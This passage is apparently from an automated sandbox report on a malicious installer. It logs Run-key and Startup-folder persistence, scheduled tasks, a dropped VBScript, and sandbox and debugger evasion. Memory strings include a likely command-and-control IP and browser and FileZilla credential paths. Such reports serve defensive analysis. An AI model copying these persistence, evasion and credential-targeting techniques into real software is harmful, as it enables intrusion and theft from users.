              Source: C:\Windows\Installer\MSI4976.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnkJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VYZSPQJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VYZSPQJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_0033F78E
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00387F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_00387F0E
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_000CF78E
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_00117F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_00117F0E
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00341E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00341E5A
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found API chain indicative of sandbox detection
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpWindow / User API: threadDelayed 5384Jump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpWindow / User API: foregroundWindowGot 1318Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Windows\Installer\MSI4976.tmpAPI coverage: 6.7 %
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeAPI coverage: 5.3 %
              Source: C:\Windows\Installer\MSI4976.tmp TID: 7768Thread sleep time: -53840s >= -30000sJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Installer\MSI4976.tmpThread sleep count: Count: 5384 delay: -10Jump to behavior
              Source: Yara matchFile source: 00000006.00000002.2614707550.0000000003830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2614274905.00000000032A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2616737221.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2614274905.00000000032C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MSI4976.tmp PID: 7764, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7852, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, type: DROPPED
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033DD92 GetFileAttributesW,FindFirstFileW,FindClose,3_2_0033DD92
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00372044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00372044
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0037219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0037219F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_003724A9
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00366B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_00366B3F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00366E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_00366E4A
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0036F350
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036FD47 FindFirstFileW,FindClose,3_2_0036FD47
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0036FDD2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_00102044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00102044
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0010219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_0010219F
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_001024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_001024A9
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_000F6B3F
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_000F6E4A
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_000FF350
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000FFD47 FindFirstFileW,FindClose,8_2_000FFD47
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CDD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_000CDD92
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_000FFDD2
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_0033E47B
              Source: MSI4976.tmp, 00000003.00000003.1372438000.0000000001928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SRACMB.exe, 0000000F.00000003.1692703031.0000000001825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: MSI4976.tmp, 00000003.00000002.2615051893.0000000001822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Installer\MSI4976.tmpAPI call chain: ExitProcess graph end nodegraph_3-91432
              Source: C:\Windows\Installer\MSI4976.tmpAPI call chain: ExitProcess graph end nodegraph_3-91879
              Source: C:\Windows\Installer\MSI4976.tmpAPI call chain: ExitProcess graph end nodegraph_3-89165
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0037703C BlockInput,3_2_0037703C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0032374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,3_2_0032374E
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003546D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,3_2_003546D0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0048B0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_0048B0C0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0034A937 GetProcessHeap,3_2_0034A937
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00348E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00348E3C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00348E19 SetUnhandledExceptionFilter,3_2_00348E19
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D8E19 SetUnhandledExceptionFilter,8_2_000D8E19
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000D8E3C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035BE95 LogonUserW,3_2_0035BE95
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0032374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,3_2_0032374E
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winmgmts:\\localhost\root\securitycenter2sracmb.exen dos@memstr_d2728ebc-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r=#]mmemstr_ad302de8-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlfpmemstr_5dda41bd-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: errorhmemstr_f11d6cf8-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: errormmemstr_c0b215c9-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v,ns memstr_9d406f87-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t,ls!memstr_bb142942-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z,bs"memstr_3b651e75-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x,@s#memstr_931c1a97-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^,fs$memstr_7954227d-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \,ds%memstr_1b22d4d9-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b,zs&memstr_691a866d-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `,xs'memstr_f45c3401-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f,^s(memstr_8cd91acd-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d,\s)memstr_31b9284d-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j,rs*memstr_ad2de3bc-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h,ps+memstr_6d05798e-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n,vs,memstr_db3187b6-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l,ts-memstr_9d473a53-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v.nu memstr_22807c5d-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t.lu!memstr_9d9f317e-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z.bu"memstr_6aafa0c1-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.@u#memstr_72fb35c1-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^.fu$memstr_06d2dc92-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \.du%memstr_9684c140-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b.zu&memstr_7bf79b42-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `.xu'memstr_94376aef-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f.^u(memstr_f64dabda-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d.\u)memstr_51571d2a-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j.ru*memstr_64037514-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h.pu+memstr_2dfe2170-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n.vu,memstr_26f1bee3-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.tu-memstr_1e6522cf-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v(nw memstr_9ec82702-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t(lw!memstr_2ebe48b1-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z(bw"memstr_cb857dbb-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x(@w#memstr_8c832e88-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^(fw$memstr_fb7851e0-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \(dw%memstr_88718290-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b(zw&memstr_c069ee5f-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `(xw'memstr_2e88703f-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f(^w(memstr_65f0f30d-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d(\w)memstr_f1a6ebb5-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j(rw*memstr_4310b4df-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h(pw+memstr_7db9d0c3-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n(vw,memstr_d1f24964-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l(tw-memstr_56c394cc-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 951l227301938l227301939l227301924lmemstr_61aa8c2d-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301908l227301909l227301924l227301935l227301926l227301922l227301913l227301926l227301939l227301944l227301911l227301946l227301937l227301945l227301924l227301951l227301922l227301950l227301947l227301894l227301924l227301945l227301920l227301951l227301938l227301939l227301924memstr_0f6aa7e2-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword version;dword formatc;ptr formats;memstr_beaec327-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: an unrecognized variable type was encountered in p8de3eo0u() (memstr_f0405ef7-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301893l227301922l227301924l227301951l227301944l227301937memstr_afcd654f-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\librariesmemstr_5db9c4b6-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\startupmemstr_2c5edaff-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 172.111.138.100memstr_05ddd58b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ulong dwminlength;ulong dwmaxlength;ulong dwincrement;f.dllmemstr_d3e38157-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\opera software\opera stable\memstr_90cbe3e6-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =9ncalrpc:[epmapper,security=impersonation dynamic false]memstr_fec01c83-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jc:\users\user\appdata\roaming\windata9vmemstr_cb5ea47c-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\microsoft\edge\user data\default\memstr_550137f1-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\google\chrome\user data\default\(memstr_65b2687c-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 227301950l227301943l227301944l227301938l227301946l227301939j$memstr_7997ad43-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword cbsize;dword dwpromptflags;hwnd hwndapp;ptr szprompt;y$memstr_bd6dbe15-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./c1./,$memstr_05530836-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\filezilla\recentservers.xmlmemstr_df7f15e8-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <%(z-memstr_3f2ce414-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?'*xmmemstr_acc71e87-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crlf(memstr_b9f8ac64-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!+z8memstr_5d59bcbb-5
